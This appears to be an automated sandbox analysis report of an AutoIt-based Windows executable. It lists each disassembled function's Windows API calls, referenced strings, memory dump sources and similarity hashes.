API String ID: 3051347437-3967369404
Opcode ID: 97ffabeb1630b9181613d6d9df259090a7a7cddbb4eb57a86fda96ed7d337a91
Instruction ID: bef02cb194056dce52f34f2dfcd0e0748e5fba99cfbd075ef469fe4f53613092
Opcode Fuzzy Hash: 97ffabeb1630b9181613d6d9df259090a7a7cddbb4eb57a86fda96ed7d337a91
Instruction Fuzzy Hash: 6F117C71200701BFEB218B65DC48F677BBAFBC5B51F15416AF856D6250DBB1E8008660

Function 00812BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 007D2B6B

Part of subcall function 007D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008A1418,?,007D2E7F,?,?,?,00000000), ref: 007D3A78

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00892224), ref: 00812C10
ShellExecuteW.SHELL32(00000000,?,?,00892224), ref: 00812C17

Strings

runas, xrefs: 00812C0B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 9b0aa34753f50769178288d67a3d6988213385902773a155daeab6709157f4bc
Instruction ID: a3e9a67048c1167a3fe416750f60a72bd27be8ed1ac4a09940147de8f8a842d1
Opcode Fuzzy Hash: 9b0aa34753f50769178288d67a3d6988213385902773a155daeab6709157f4bc
Instruction Fuzzy Hash: B711D231208241EADB04FF64D8599BEBBB5FFA5750F04142FF186823A3DF6C894A8712

Function 0083DBBE Relevance: 6.0, APIs: 4, Instructions: 29
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,00815222), ref: 0083DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0083DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0083DBEE
FindClose.KERNEL32(00000000), ref: 0083DBFA

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 7672076da8f277fc62cb8c6bceba95732052c8c7df1b80b1062385e9ac4c5d77
Instruction ID: 6cc1cdc8f9ab526b69dd2bd3342de2da68d6266c416b5989cf4d133a0acbe677
Opcode Fuzzy Hash: 7672076da8f277fc62cb8c6bceba95732052c8c7df1b80b1062385e9ac4c5d77
Instruction Fuzzy Hash: CAF0A070820A145782206B78AC0D8BA776CFF82334F106702F8B6C22E0EBF0995686D5

Function 0085AFF9 Relevance: 24.4, APIs: 16, Instructions: 418
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0085B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0085B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0085B1D4
_wcslen.LIBCMT ref: 0085B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0085B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0085B236
_wcslen.LIBCMT ref: 0085B332

Part of subcall function 008405A7: GetStdHandle.KERNEL32(000000F6), ref: 008405C6

_wcslen.LIBCMT ref: 0085B34B
_wcslen.LIBCMT ref: 0085B366
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0085B3B6
GetLastError.KERNEL32(00000000), ref: 0085B407
CloseHandle.KERNEL32(?), ref: 0085B439
CloseHandle.KERNEL32(00000000), ref: 0085B44A
CloseHandle.KERNEL32(00000000), ref: 0085B45C
CloseHandle.KERNEL32(00000000), ref: 0085B46E
CloseHandle.KERNEL32(?), ref: 0085B4E3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 9c67784f5b884acdc732ee540c8aa8af1f085620894673076830705fcadca606
Instruction ID: 7b2ef1893a36b89d1627303fe31c5fc38e97c49753ab98c04b3b52e98780922c
Opcode Fuzzy Hash: 9c67784f5b884acdc732ee540c8aa8af1f085620894673076830705fcadca606
Instruction Fuzzy Hash: F5F16931608240DFC724EF24C895A6ABBE1FF85314F14855EF8999B3A2DB35EC48CB52

Function 007DD730 Relevance: 21.6, APIs: 14, Instructions: 625sleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 007DD807
timeGetTime.WINMM ref: 007DDA07
Sleep.KERNELBASE(0000000A), ref: 007DDBB1
Sleep.KERNEL32(0000000A), ref: 00822B76

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Sleep$InputStateTimetime
String ID:
API String ID: 2764417729-0
Opcode ID: c9f2a1c906171fc0e576c534c0542945888d8853ee8689baeb45c42e2c7a6988
Instruction ID: e5af3c6081de3272032d17ff15709de394c4cd15f06e04fc3bff53909bb7b099
Opcode Fuzzy Hash: c9f2a1c906171fc0e576c534c0542945888d8853ee8689baeb45c42e2c7a6988
Instruction Fuzzy Hash: 8A42F070608251EFDB35CF24C898B6ABBB0FF86314F14851AE49687391D779EC84CB92

Function 007D2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D2D07
RegisterClassExW.USER32(00000030), ref: 007D2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D2D42
InitCommonControlsEx.COMCTL32(?), ref: 007D2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D2D6F
LoadIconW.USER32(000000A9), ref: 007D2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D2D94

Strings

AutoIt v3 GUI, xrefs: 007D2D23
TaskbarCreated, xrefs: 007D2D37
+, xrefs: 007D2CF0
0, xrefs: 007D2CE9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: bc003ee842a47a78697939dfa2b669dfb962b3ae74b771a5e0d4b3ac121fa736
Instruction ID: d4a68b541aa0f249e5bb4a1eb575c74fc08f1ca655e3e5e7d211e000c9652f04
Opcode Fuzzy Hash: bc003ee842a47a78697939dfa2b669dfb962b3ae74b771a5e0d4b3ac121fa736
Instruction Fuzzy Hash: 2F21E0B5901318AFEF00DFA8E889BEEBFB4FB09701F00911AF651A62A0D7B55544CF91

Function 0081065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0081039A: CreateFileW.KERNELBASE(00000000,00000000,?,00810704,?,?,00000000,?,00810704,00000000,0000000C), ref: 008103B7

GetLastError.KERNEL32 ref: 0081076F
__dosmaperr.LIBCMT ref: 00810776
GetFileType.KERNELBASE(00000000), ref: 00810782
GetLastError.KERNEL32 ref: 0081078C
__dosmaperr.LIBCMT ref: 00810795
CloseHandle.KERNEL32(00000000), ref: 008107B5
CloseHandle.KERNEL32(?), ref: 008108FF
GetLastError.KERNEL32 ref: 00810931
__dosmaperr.LIBCMT ref: 00810938

Strings

H, xrefs: 008108BD

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: fcdf90714a501250fa68fbd55047c319de87c3a1ca508b89dae1448b6fe487d1
Instruction ID: e1031f20bc74ce7b642b721f376c465629e553111624e377c6a26bcdfca86f10
Opcode Fuzzy Hash: fcdf90714a501250fa68fbd55047c319de87c3a1ca508b89dae1448b6fe487d1
Instruction Fuzzy Hash: FAA1F032A041088FDF19AF68DC95BEE7BA4FF06324F140159E815EB3D2DA759892CF91

Function 007D344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008A1418,?,007D2E7F,?,?,?,00000000), ref: 007D3A78

Part of subcall function 007D3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007D3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0081318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008131CE
RegCloseKey.ADVAPI32(?), ref: 00813210
_wcslen.LIBCMT ref: 00813277
_wcslen.LIBCMT ref: 00813286

Strings

Software\AutoIt v3\AutoIt, xrefs: 007D3560
\Include\, xrefs: 007D3527
Include, xrefs: 00813184, 008131C5
\, xrefs: 0081328C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 40f75dc344d16e2e1c24a8e713a56672fa15269fabc55372599838ae5c944b27
Instruction ID: 8046b023401d41a2a6274205a98d62100ed52ed98f88ee7aa44ee3abb719426f
Opcode Fuzzy Hash: 40f75dc344d16e2e1c24a8e713a56672fa15269fabc55372599838ae5c944b27
Instruction Fuzzy Hash: 35715B71504301AED724EF69DC859ABBBF8FF86740B40442EF585C3670EB799A48CB62

Function 007D2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 007D2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 007D2B9D
LoadIconW.USER32(00000063), ref: 007D2BB3
LoadIconW.USER32(000000A4), ref: 007D2BC5
LoadIconW.USER32(000000A2), ref: 007D2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D2BEF
RegisterClassExW.USER32(?), ref: 007D2C40

Part of subcall function 007D2CD4: GetSysColorBrush.USER32(0000000F), ref: 007D2D07
Part of subcall function 007D2CD4: RegisterClassExW.USER32(00000030), ref: 007D2D31
Part of subcall function 007D2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D2D42
Part of subcall function 007D2CD4: InitCommonControlsEx.COMCTL32(?), ref: 007D2D5F
Part of subcall function 007D2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D2D6F
Part of subcall function 007D2CD4: LoadIconW.USER32(000000A9), ref: 007D2D85
Part of subcall function 007D2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D2D94

Strings

0, xrefs: 007D2C0F
#, xrefs: 007D2C16
AutoIt v3, xrefs: 007D2C2F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 4fe8ea59ef1b1f2e10dca2f14db1c6db6dc2c499b4b785b158da1ad3e4d8fad3
Instruction ID: 5f8846bd94ecc5270a0153e081dfad5d2c8366eb406e3807554112e1989d0e0c
Opcode Fuzzy Hash: 4fe8ea59ef1b1f2e10dca2f14db1c6db6dc2c499b4b785b158da1ad3e4d8fad3
Instruction Fuzzy Hash: BD211A74E00318AFEF109FA9EC59BA97FF4FB49B50F04501AE504A6BA0D7B90540CF90

Function 007D3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,007D316A,?,?), ref: 007D31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,007D316A,?,?), ref: 007D3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,007D316A,?,?), ref: 007D3232
CreatePopupMenu.USER32 ref: 007D3246
PostQuitMessage.USER32(00000000), ref: 007D3267

Strings

TaskbarCreated, xrefs: 007D322D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4332747bc5689926b26afe520cc7dc5bfb53a9ccde908baee505a478e7fcbdb5
Instruction ID: 3da417bff3bfe66b0327c30a93be2ae3c7fe8c88c44258710ddf6793a041724e
Opcode Fuzzy Hash: 4332747bc5689926b26afe520cc7dc5bfb53a9ccde908baee505a478e7fcbdb5
Instruction Fuzzy Hash: AB41F935640609A7EF145FBCAC5DBBA3A79FB06340F080127F551C6BA1C7AE9A4097A3

Function 007D2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,007D1CAD,?), ref: 007D2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,007D1CAD,?), ref: 007D2CCF

Strings

edit, xrefs: 007D2CAC
AutoIt v3, xrefs: 007D2C89, 007D2C8E, 007D2C8F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a0a869455af8174e649012c85908afdbceb655b34838265339a057344cac8c7c
Instruction ID: 8cc876c0da265732181f19b20769dc22dcbf52a58d6cc632f7ba0e22ac90898a
Opcode Fuzzy Hash: a0a869455af8174e649012c85908afdbceb655b34838265339a057344cac8c7c
Instruction Fuzzy Hash: DAF0DA765402A07AFF311B17AC0DE772EBDF7C7F60F01105AF900A2AA0C6A91850DBB0

Function 0083E97B Relevance: 7.5, APIs: 5, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0083E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0083E9A5
Sleep.KERNEL32(00000000), ref: 0083E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0083E9B7
Sleep.KERNELBASE ref: 0083E9F3

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: acab8a6654d5d8fedba8883e00bcfdf8ef716c92bd7488e84cd25d1882d402ec
Instruction ID: a28746ea985f5f47e013a6f06d755426fd30c4aab0539cae8e4b11a6c6b7f0b6
Opcode Fuzzy Hash: acab8a6654d5d8fedba8883e00bcfdf8ef716c92bd7488e84cd25d1882d402ec
Instruction Fuzzy Hash: D2011331C0162DDBCF00ABE5DC59AEDBF78FF49702F010556E942F2281CB7096568BA2

Function 007D3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,007D3B0F,SwapMouseButtons,00000004,?), ref: 007D3B83

Strings

Control Panel\Mouse, xrefs: 007D3B3E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: f519f6d519e2c63645c26eddd5b68002d1f0685959ac089df1a643a20dca4c5f
Instruction ID: b10281e70d386c298b4bcb8fb2efe734a629ac003372f586d4372f91dbdd9881
Opcode Fuzzy Hash: f519f6d519e2c63645c26eddd5b68002d1f0685959ac089df1a643a20dca4c5f
Instruction Fuzzy Hash: E01127B5610208FFDB208FA5DC85AAEBBB8EF04744B10846BE845D7210E2759E409BA1

Function 007D3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008133A2

Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D3A04

Strings

Line: , xrefs: 008133EB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 3718aabfe9c8863fdd85cb120ea50a8ffc18363216799e771a6d33d34348899d
Instruction ID: 7c9eb3bbe55b869a88ba4c6d1959298e26be33727c81a3ed7222cc6d1848cc75
Opcode Fuzzy Hash: 3718aabfe9c8863fdd85cb120ea50a8ffc18363216799e771a6d33d34348899d
Instruction Fuzzy Hash: D131C471508304AADB21EB10DC49BEBB7ECBF41714F00452BF59982791DB78AA48C7D3

Function 007EFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 007F0668

Part of subcall function 007F32A4: RaiseException.KERNEL32(?,?,?,007F068A,?,008A1444,?,?,?,?,?,?,007F068A,007D1129,00898738,007D1129), ref: 007F3304

__CxxThrowException@8.LIBVCRUNTIME ref: 007F0685

Strings

Unknown exception, xrefs: 007F0692

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 5b096595640810be5432303561e84a92708ce708c91822821a61cb251ec9a361
Instruction ID: aa938632555f7bdcbc80cb8708df346a0401f2cd6a279eccde29245edece519a
Opcode Fuzzy Hash: 5b096595640810be5432303561e84a92708ce708c91822821a61cb251ec9a361
Instruction Fuzzy Hash: CCF0A42490020DF7CF04B6A5DC5AD7E7B6CAE40350B604131BB24D6792EF79DA2585C0

Function 007D10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4
Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 007D1BFC
Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D1C07
Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D1C12
Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 007D1C1A
Part of subcall function 007D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 007D1C22

Part of subcall function 007D1B4A: RegisterWindowMessageW.USER32(00000004,?,007D12C4), ref: 007D1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007D136A
OleInitialize.OLE32 ref: 007D1388
CloseHandle.KERNEL32(00000000,00000000), ref: 008124AB

Memory Dump Source

